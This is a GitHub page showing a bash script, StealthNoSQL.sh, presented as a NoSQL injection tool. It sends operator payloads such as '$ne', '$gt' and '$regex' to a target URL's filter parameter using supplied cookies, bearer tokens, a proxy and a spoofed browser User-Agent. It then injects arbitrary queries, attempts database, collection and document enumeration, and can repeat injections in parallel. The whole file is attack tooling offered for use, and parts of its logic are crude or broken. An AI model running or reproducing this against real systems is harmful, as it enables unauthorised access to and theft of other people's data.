-
Notifications
You must be signed in to change notification settings - Fork 2
/
StealthNoSQL.sh
183 lines (153 loc) · 5.1 KB
/
StealthNoSQL.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
#!/bin/bash
print_banner() {
local banner=(
"******************************************"
"* StealthNoSQL *"
"* The Ultimate NoSQL Injection Tool *"
"* v1.3.0 *"
"* ---------------------------- *"
"* by @ImKKingshuk *"
"* Github- https://github.com/ImKKingshuk *"
"******************************************"
)
local width=$(tput cols)
for line in "${banner[@]}"; do
printf "%*s\n" $(((${#line} + width) / 2)) "$line"
done
echo
}
make_request() {
local url="$1"
local headers=()
if [ -n "$session_cookie" ]; then
headers+=("-H" "Cookie: $session_cookie")
fi
if [ -n "$auth_token" ]; then
headers+=("-H" "Authorization: Bearer $auth_token")
fi
if [ -n "$custom_headers" ]; then
IFS=',' read -ra hdrs <<< "$custom_headers"
for hdr in "${hdrs[@]}"; do
headers+=("-H" "$hdr")
done
fi
curl -s -k -A "$user_agent" --proxy "$proxy" "${headers[@]}" "$url"
}
encode_payload() {
local payload="$1"
echo -n "$payload" | jq -sRr @uri
}
detect_nosqli() {
local url="$1"
local payloads=(
'{"$ne": null}'
'{"$gt": ""}'
'{"$regex": "^a"}'
'{"$eq": "a"}'
'{"$in": ["a", "b", "c"]}'
'{"$not": {"$type": 2}}'
'{"username": {"$regex": "^admin"}}'
)
echo "Detecting NoSQL injection vulnerabilities..."
for payload in "${payloads[@]}"; do
full_url="$url?filter=$(encode_payload "$payload")"
response=$(make_request "$full_url")
if [[ "$response" =~ "error" || "$response" =~ "found" ]]; then
echo "Potential NoSQL Injection found with payload: $payload"
return 0
fi
done
echo "No NoSQL Injection vulnerabilities detected."
return 1
}
nosql_injection() {
local url="$1"
local query="$2"
local encoded_payload
echo "Injecting NoSQL payload..."
encoded_payload=$(encode_payload "$query")
full_url="$url?filter=$encoded_payload"
response=$(make_request "$full_url")
echo "Response: $response"
}
enumerate_nosql() {
local url="$1"
local target="$2"
local enum_type="$3"
local query
case $enum_type in
databases)
query='{"listDatabases": 1}'
;;
collections)
query='{"listCollections": 1}'
;;
documents)
query='{}'
;;
*)
echo "Invalid enumeration type."
return 1
;;
esac
nosql_injection "$url" "$query"
}
parallel_execution() {
local url="$1"
local query="$2"
local threads="$3"
echo "Starting parallel execution with $threads threads..."
for i in $(seq 1 "$threads"); do
nosql_injection "$url" "$query" &
done
wait
echo "Parallel execution completed."
}
real_time_monitoring() {
local log_file="$1"
tail -f "$log_file"
}
generate_report() {
local format="$1"
local report_file="nosql_report.$format"
echo -e "$output" > "$report_file"
echo "Report generated: $report_file"
}
main() {
print_banner
read -p "Enter the target URL (e.g., https://www.example.com): " url
url="${url%/}"
read -p "Enter the session cookie (if any, press Enter to skip): " session_cookie
read -p "Enter the authentication token (if any, press Enter to skip): " auth_token
read -p "Enter the proxy (if any, press Enter to skip): " proxy
read -p "Enter custom headers (comma separated, if any, press Enter to skip): " custom_headers
read -p "Enter the User-Agent (if any, press Enter to use default): " user_agent
user_agent="${user_agent:-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36}"
detect_nosqli "$url"
read -p "Would you like to perform an injection? (y/n): " inject_choice
if [ "$inject_choice" == "y" ]; then
read -p "Enter the injection query: " query_input
nosql_injection "$url" "$query_input"
fi
read -p "Would you like to enumerate databases, collections, or documents? (databases/collections/documents/none): " enum_choice
if [ "$enum_choice" != "none" ]; then
read -p "Enter the target name for enumeration: " enum_target
enumerate_nosql "$url" "$enum_target" "$enum_choice"
fi
read -p "Enable multi-threading? (y/n): " multi_thread_choice
if [ "$multi_thread_choice" == "y" ]; then
read -p "Enter the number of threads: " threads
parallel_execution "$url" "$query_input" "$threads"
fi
read -p "Enable real-time monitoring? (y/n): " monitor_choice
if [ "$monitor_choice" == "y" ]; then
read -p "Enter the log file path: " log_file
real_time_monitoring "$log_file"
fi
read -p "Generate report? (y/n): " generate_report_choice
if [ "$generate_report_choice" == "y" ]; then
read -p "Enter report format (html/json/csv): " report_format
generate_report "$report_format"
fi
}
main